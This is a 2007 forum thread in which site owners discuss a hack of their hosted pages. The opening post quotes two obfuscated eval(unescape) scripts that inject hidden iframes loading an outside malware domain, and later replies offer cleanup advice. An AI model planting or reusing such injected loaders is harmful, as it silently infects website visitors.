|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
11-24-2007, 07:57 PM
|
#1 |
|
Confirmed User
Join Date: Sep 2006
Location: MTL
Posts: 5,755
|
so those viruses on my tgp is back... any one else?
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script> hosted at webair, i have 0 scripts any one else?  |
|
|
|
11-24-2007, 07:59 PM
|
#2 |
|
Confirmed User
Join Date: Sep 2006
Location: MTL
Posts: 5,755
|
|
|
|
|
|
11-24-2007, 08:20 PM
|
#3 |
|
Confirmed User
Join Date: Mar 2007
Posts: 922
|
__________________
Vote Bill Cosby 2012 |
|
|
|
|
11-25-2007, 12:08 AM
|
#4 |
|
Confirmed User
Join Date: Feb 2006
Posts: 2,848
|
Let me guess cpanel?
|
|
|
|
|
11-25-2007, 01:01 AM
|
#5 | |
|
►SouthOfHeaven
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
|
Quote:
__________________
hatisblack at yahoo.com |
|
|
|
|
|
11-25-2007, 01:15 AM
|
#6 |
|
Confirmed User
Join Date: Sep 2006
Location: internets
Posts: 6,954
|
thanks for the heads up...checked some sites
and i got the same code files modified on nov19th =\
__________________
Teen Porn Models / Solo Girls |
|
|
|
|
11-25-2007, 01:42 AM
|
#7 |
|
Confirmed User
Join Date: May 2002
Location: European Union
Posts: 3,815
|
Your server got hacked, a good idea would be to check your sites files for recently changed or newly added files, you can alos do that through FTP.
And through SSH you could take a look what recently happend on your server with the "last" command. Oh and update your box  |
|
|
|
|
11-25-2007, 01:53 AM
|
#8 |
|
Damn Right I Kiss Ass!
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,422
|
Webair has problems....
|
|
|
|
|
11-25-2007, 05:46 AM
|
#9 |
|
Confirmed User
Industry Role:
Join Date: Jul 2003
Posts: 5,344
|
use this encoder/decoder:
http://d21c.com/sookietex/ASCII2HEX.html |
|
|
|
|
11-25-2007, 05:48 AM
|
#10 |
|
Confirmed User
Industry Role:
Join Date: Jul 2003
Posts: 5,344
|
here is is decoded:
PHP Code:
|
|
|
|
|
11-25-2007, 05:52 AM
|
#11 |
|
AdultTubeSubmits.com
Industry Role:
Join Date: Dec 2003
Location: The Netherlands
Posts: 10,598
|
Delete all php files from your server and then start cleaning up the mess with a code that represses.
__________________
https://stripcash.com/sign-up/?userI...fff832eb95ab6a |
|
|
|
|
11-25-2007, 05:53 AM
|
#12 |
|
Confirmed User
Join Date: Aug 2002
Location: UK
Posts: 3,198
|
i had this problem, got rid of it recently and im still ok at the moment, im with webair too.
__________________
Take it Easy !!!  
|
|
|
|
|
11-25-2007, 06:57 AM
|
#13 |
|
Confirmed User
Join Date: Dec 2001
Posts: 4,513
|
I get them on ocassion...
I've cleaned up, changed passwords, removed all php, and still have them show up now and then... The php I did use were just single file parser scripts.. Anyone know of a way to restrict ftp access to a given ip address? |
|
|
|
|
11-25-2007, 08:19 AM
|
#14 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: Oct 2002
Location: Montreal, Quebec
Posts: 29,802
|
Quote:
__________________
I know that Asspimple is stoopid ... As he says, it is a FACT ! But I can't figure out how he can breathe or type , at the same time .... |
|
|
|
|
|
11-25-2007, 08:20 AM
|
#15 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: Oct 2002
Location: Montreal, Quebec
Posts: 29,802
|
Quote:
__________________
I know that Asspimple is stoopid ... As he says, it is a FACT ! But I can't figure out how he can breathe or type , at the same time .... |
|
|
|
|
|
11-25-2007, 08:33 AM
|
#16 |
|
Confirmed User
Industry Role:
Join Date: Jul 2003
Posts: 5,344
|
what do you guys mean "remove all php files" ? how it this related to php?
|
|
|
|
|
11-25-2007, 08:38 AM
|
#17 |
|
Confirmed User
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
|
Are you on a dedicated box?
__________________
 A girl once told me "Give me 8 inches and make it HURT". So, I fucked her twice and hit her with a brick. |
|
|
|
|
11-25-2007, 08:40 AM
|
#18 |
|
Confirmed User
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
|
__________________
A girl once told me "Give me 8 inches and make it HURT". So, I fucked her twice and hit her with a brick. |
|
|
|
|
11-25-2007, 09:00 AM
|
#19 |
|
Confirmed User
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
|
I hope webair are looking into this problem with you, because there might be some weird/illegal activities going onright now...
http://www.honeynet.org.cn/downloads...etworks_EC.htm
__________________
A girl once told me "Give me 8 inches and make it HURT". So, I fucked her twice and hit her with a brick. |
|
|
|
|
11-25-2007, 09:17 AM
|
#20 | |
|
Confirmed User
Join Date: May 2002
Location: European Union
Posts: 3,815
|
Quote:
|
|
|
|
|
|
11-25-2007, 09:39 AM
|
#21 |
|
Confirmed User
Industry Role:
Join Date: Jul 2003
Posts: 5,344
|
bbbbbbbump
|
|
|
|
|
11-25-2007, 10:36 AM
|
#22 |
|
In Tushy Land
Join Date: Oct 2002
Location: Nebraska
Posts: 40,149
|
that sucks for you
|
|
|
|
|
12-14-2007, 11:17 AM
|
#23 |
|
Confirmed User
Industry Role:
Join Date: Aug 2004
Location: Orange County, CA
Posts: 694
|
Yeah, webair has been beginning to suck. Who is the webair replacement?
__________________
The Print Foundry Co. - Design & Print Shop - ICQ: 371115529 |
|
|
|
|
12-14-2007, 11:20 AM
|
#24 |
|
Confirmed User
Join Date: Sep 2003
Posts: 8,713
|
yeah not good.. good luck with resolving this...
__________________
 TrafficCashGold Paying Webmasters Since 1996! Awesome Conversions! Fast Weekly Payments! Over 125 Tours! |
|
|
|
|
12-14-2007, 11:31 AM
|
#25 | |
|
Confirmed User
Industry Role:
Join Date: Mar 2007
Posts: 7,771
|
Quote:
__________________
 
|
|
|
|
|
|
12-14-2007, 06:24 PM
|
#26 |
|
Confirmed User
Join Date: Dec 2001
Location: The Great USA
Posts: 1,632
|
Once your server get compromised like this the only 100% fail safe way to get it back is to format it, and make sure your host knows how to firewall it this time. This should never or very rarely happen if the server is being managed properly.
 |
|
|
|
|
12-14-2007, 06:56 PM
|
#27 |
|
Confirmed User
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
|
If still not fixed, you have to check which scripts you run on your server and if any of those scripts versions are vulnerable to known exploits.
|
|
|
|
|
12-14-2007, 07:36 PM
|
#28 |
|
Confirmed User
Join Date: Jan 2006
Location: Mobile, AL
Posts: 1,647
|
But does your antivirus detect it when you load your page? If not then it is something way more evil (undetectable Russian rootkit)
__________________
 |
|
|
|
